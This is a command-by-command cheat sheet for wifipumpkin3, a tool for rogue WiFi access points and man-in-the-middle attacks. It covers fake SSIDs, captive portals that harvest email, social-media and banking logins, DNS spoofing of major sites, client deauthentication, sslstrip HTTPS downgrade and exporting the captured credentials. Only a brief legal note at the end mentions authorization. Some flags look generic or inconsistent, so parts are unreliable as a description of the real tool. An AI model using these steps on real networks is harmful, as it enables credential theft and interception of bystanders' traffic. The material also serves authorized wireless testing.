wifipumpkin3

Overview

wifipumpkin3 is a powerful Python 3 framework for creating rogue WiFi access points and performing MITM (Man-in-the-Middle) attacks. It enables wireless penetration testing through fake WiFi networks, captive portal credential harvesting, DNS spoofing, and traffic interception. Designed for authorized security testing and red team operations.

Installation

Command	Description
`git clone https://github.com/mh4x0f/wifipumpkin3.git`	Clone the repository
`cd wifipumpkin3`	Navigate to directory
`python3 -m pip install -r requirements.txt`	Install dependencies
`sudo python3 setup.py install`	Install wifipumpkin3 globally
`pip3 install --user wifipumpkin3`	User-level installation

Prerequisites

Linux system (Kali, Ubuntu, Debian recommended)
Python 3.6+
Wireless adapter with monitor mode capability
Root/sudo privileges required
hostapd, dnsmasq, iptables installed

Basic Commands

Command	Description
`sudo wifipumpkin3`	Launch interactive mode
`sudo wifipumpkin3 -i`	Interactive CLI mode
`sudo wifipumpkin3 --help`	Display help menu
`sudo wifipumpkin3 --version`	Show version information
`sudo wifipumpkin3 -x`	Exit without cleanup

Creating Rogue Access Points

Basic Rogue AP Setup

# Launch interactive mode
sudo wifipumpkin3

# In interactive menu:
# 1. Select wireless interface
# 2. Choose SSID name
# 3. Configure channel
# 4. Set authentication type (Open/WPA2)
# 5. Start AP

Command-Line AP Creation

# Start with specific SSID
sudo wifipumpkin3 --ssid "FreeWiFi" --interface wlan0

# Set channel
sudo wifipumpkin3 --ssid "Corporate" --channel 6

# Configure WPA2 password
sudo wifipumpkin3 --ssid "Secure" --password "123456"

# Open network (no authentication)
sudo wifipumpkin3 --ssid "OpenNet" --type open

Wireless Interface Management

Command	Description
`ifconfig`	List network interfaces
`ip link show`	Display interface status
`sudo airmon-ng check kill`	Kill blocking processes
`sudo airmon-ng start wlan0`	Enable monitor mode (wlan0mon)
`sudo airmon-ng stop wlan0mon`	Disable monitor mode
`iwconfig`	Check wireless configuration

Captive Portal Configuration

Portal Types

Portal Type	Use Case
Login Portal	Harvests username/password
Social Media	Fake Facebook/Instagram login
Update Portal	Fake system/browser updates
ISP Portal	Mimics ISP authentication
Custom HTML	User-defined portal page

Creating Custom Captive Portal

# Access portal templates directory
cd /usr/share/wifipumpkin3/template

# View available templates
ls -la

# Edit HTML template
nano custom_portal.html

# Template structure:
# - HTML form with POST method
# - Target: /api/auth or custom endpoint
# - Fields for username, password, email, phone

Basic HTML Portal Template

cat > /tmp/portal.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>WiFi Login</title>
    <style>
        body { font-family: Arial; text-align: center; padding: 50px; }
        form { max-width: 300px; margin: auto; }
        input { width: 100%; padding: 10px; margin: 10px 0; }
        button { width: 100%; padding: 10px; background: #007bff; color: white; }
    </style>
</head>
<body>
    <h1>Free WiFi</h1>
    <form method="POST" action="/api/auth">
        <input type="email" name="email" placeholder="Email" required>
        <input type="password" name="password" placeholder="Password" required>
        <button type="submit">Connect</button>
    </form>
</body>
</html>
EOF

DNS Spoofing

DNS Configuration

Command	Description
`set dns.server [IP]`	Set DNS server IP
`set dns.redirect [domain]`	Redirect domain
`enable dns`	Enable DNS spoofing
`disable dns`	Disable DNS spoofing

DNS Spoof Examples

# Redirect all traffic to attacker IP
sudo wifipumpkin3 --dns-spoof 192.168.1.100

# Spoof specific domain
# Edit /etc/wifipumpkin3/dns.conf
192.168.1.100 google.com
192.168.1.100 facebook.com
192.168.1.100 twitter.com

# Load custom DNS config
sudo wifipumpkin3 --dns-config /path/to/dns.conf

DHCP Server Configuration

Setting	Command
DHCP range start	`set dhcp.start 192.168.1.100`
DHCP range end	`set dhcp.end 192.168.1.200`
Gateway IP	`set dhcp.gateway 192.168.1.1`
Subnet mask	`set dhcp.netmask 255.255.255.0`
DNS server	`set dhcp.dns 192.168.1.1`
Lease time	`set dhcp.lease 3600`

DHCP Configuration File

# DHCP config location
/etc/wifipumpkin3/dhcp.conf

# Example configuration
interface=wlan0
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=option:router,192.168.1.1
dhcp-option=option:dns-server,192.168.1.1
dhcp-option=option:domain-name,local

Proxy Plugins (Pumpkin-Proxy)

Available Proxy Modules

Module	Function
`urllib3`	HTTP/HTTPS proxy
`dns-spoof`	DNS hijacking
`inject-code`	Code injection
`redirect`	Traffic redirection
`log-traffic`	Packet logging

Enable Proxy Plugin

# In interactive mode
plugins
# Select proxy module
# Configure options

# CLI method
sudo wifipumpkin3 --plugin urllib3 --plugin-opts "log=true"

Custom Proxy Configuration

# Edit proxy configuration
nano /etc/wifipumpkin3/proxy.conf

# Configuration options
[proxy]
enabled = true
port = 8080
log_traffic = true
log_file = /var/log/wifipumpkin3/proxy.log
cache_enabled = true

Traffic Sniffing and Logging

Command	Description
`sniff start`	Begin packet capture
`sniff stop`	End packet capture
`sniff export`	Export captured data
`sniff filter [type]`	Filter by packet type
`log view`	View activity logs
`log clear`	Clear log files

Packet Capture Examples

# Capture HTTP credentials
sudo wifipumpkin3 --sniff http

# Capture HTTPS traffic
sudo wifipumpkin3 --sniff https

# Capture all traffic
sudo wifipumpkin3 --sniff all

# Save to PCAP file
sudo wifipumpkin3 --pcap /tmp/capture.pcap

Log File Locations

# Main logs
/var/log/wifipumpkin3/

# Credential captures
/var/log/wifipumpkin3/credentials.log

# Traffic logs
/var/log/wifipumpkin3/traffic.log

# Captured clients
/var/log/wifipumpkin3/clients.log

Credential Harvesting

Captive Portal Harvesting

# Enable credential logging
set logging.credentials true

# View captured credentials
tail -f /var/log/wifipumpkin3/credentials.log

# Export credentials
wifipumpkin3-export --format csv credentials.log

Credential Format

[timestamp] - username:password
[timestamp] - email:password
[timestamp] - phone:code

Targeted Credential Harvesting

# Harvest specific service credentials
sudo wifipumpkin3 --portal facebook

# Social media harvesting
sudo wifipumpkin3 --portal instagram

# Bank login harvesting
sudo wifipumpkin3 --portal banking

Deauthentication Attacks

Deauth Commands

Command	Description
`deauth all`	Deauth all clients
`deauth [MAC]`	Target specific client
`deauth --bssid [BSSID]`	Deauth by AP
`deauth --count [N]`	Send N deauth frames
`deauth --interval [ms]`	Set interval between frames

Deauth Examples

# Deauth all clients from AP
sudo wifipumpkin3 --deauth all

# Deauth specific client
sudo wifipumpkin3 --deauth AA:BB:CC:DD:EE:FF

# Continuous deauth with interval
sudo wifipumpkin3 --deauth all --interval 100

# Limit deauth packets
sudo wifipumpkin3 --deauth all --count 50

Module System

Available Modules

Module	Purpose
`hostapd`	Access point control
`dnsmasq`	DHCP/DNS server
`iptables`	Packet filtering/NAT
`ettercap`	MITM attack engine
`sslstrip`	HTTPS downgrade
`mitmproxy`	HTTP/HTTPS proxy

Module Management

# List loaded modules
modules list

# Enable module
modules enable [name]

# Disable module
modules disable [name]

# Check module status
modules status

# View module logs
modules log [name]

Custom Module Creation

# Module directory
/usr/share/wifipumpkin3/modules/

# Module template
#!/usr/bin/env python3
class CustomModule:
    def __init__(self):
        self.name = "custom_module"
        self.enabled = False
    
    def start(self):
        self.enabled = True
    
    def stop(self):
        self.enabled = False

# Access main menu
? - Show commands
help - Display full help
exit - Quit application
clear - Clear screen

# Submenu access
ap - Access point settings
dhcp - DHCP configuration
dns - DNS spoofing options
proxy - Proxy settings
plugins - Load plugins
sniff - Packet sniffing
logs - View logs
clients - Connected clients

Client Management

# List connected clients
clients list

# Show client details
clients info [MAC]

# Kick client offline
clients kick [MAC]

# Block client MAC
clients block [MAC]

# View client packets
clients sniff [MAC]

Advanced Usage

Starting with Configuration File

# Create config file
cat > /tmp/wifipumpkin3.conf << 'EOF'
[ap]
ssid = FreeWiFi
interface = wlan0
channel = 6
password = 

[dhcp]
start = 192.168.1.100
end = 192.168.1.200
gateway = 192.168.1.1

[dns]
spoof = true
redirect = 192.168.1.1

[logging]
credentials = true
traffic = true
EOF

# Launch with config
sudo wifipumpkin3 --config /tmp/wifipumpkin3.conf

Multi-SSID Broadcasting

# Create multiple SSIDs
sudo wifipumpkin3 --ssid "FreeWiFi" --ssid "Starbucks" --ssid "Airport"

# Different channels per SSID
sudo wifipumpkin3 --ssid "Network1" --channel 1 --ssid "Network2" --channel 6

SSL Strip Configuration

# Enable HTTPS downgrade
set sslstrip.enabled true

# Configure port
set sslstrip.port 8080

# Log SSL sessions
set sslstrip.log true

Troubleshooting

Issue	Solution
”Permission denied”	Run with `sudo`
Adapter in use	`sudo airmon-ng check kill`
DHCP not working	Restart dnsmasq: `sudo service dnsmasq restart`
DNS not resolving	Check `/etc/resolv.conf` permissions
Clients can’t connect	Verify hostapd is running: `ps aux \| grep hostapd`
Capture not logging	Check log directory permissions: `chmod 755 /var/log/wifipumpkin3/`

Debug Mode

# Run with verbose logging
sudo wifipumpkin3 -vvv

# Enable debug output
sudo wifipumpkin3 --debug

# Check service status
sudo systemctl status wifipumpkin3

# View system logs
sudo journalctl -u wifipumpkin3 -f

Cleanup and Restoration

# Stop all wifipumpkin3 processes
sudo wifipumpkin3 --stop

# Kill AP and restore network
sudo wifipumpkin3 --cleanup

# Reset hostapd
sudo killall hostapd

# Restart networking
sudo systemctl restart networking

# Restore iptables rules
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -F
sudo iptables -X

Legal and Ethical Considerations

Authorization required: Only use on networks you own or have explicit permission to test
Jurisdiction: Check local laws regarding WiFi interception and MITM attacks
Logging: Comply with data retention and privacy laws
Disclosure: Report vulnerabilities to system owners
Professional use: Restrict to authorized penetration testing engagements

Resources

Resource	Purpose
GitHub Repository	Official source code
Documentation Wiki	Full documentation
Issue Tracker	Bug reports and support
Kali Tools	Kali Linux integration

hostapd - WiFi access point daemon
dnsmasq - DHCP and DNS server
ettercap - Network MITM framework
mitmproxy - Interactive HTTPS proxy
Wireshark - Network packet analysis
aircrack-ng - WiFi security auditing
hashcat - Password hash cracking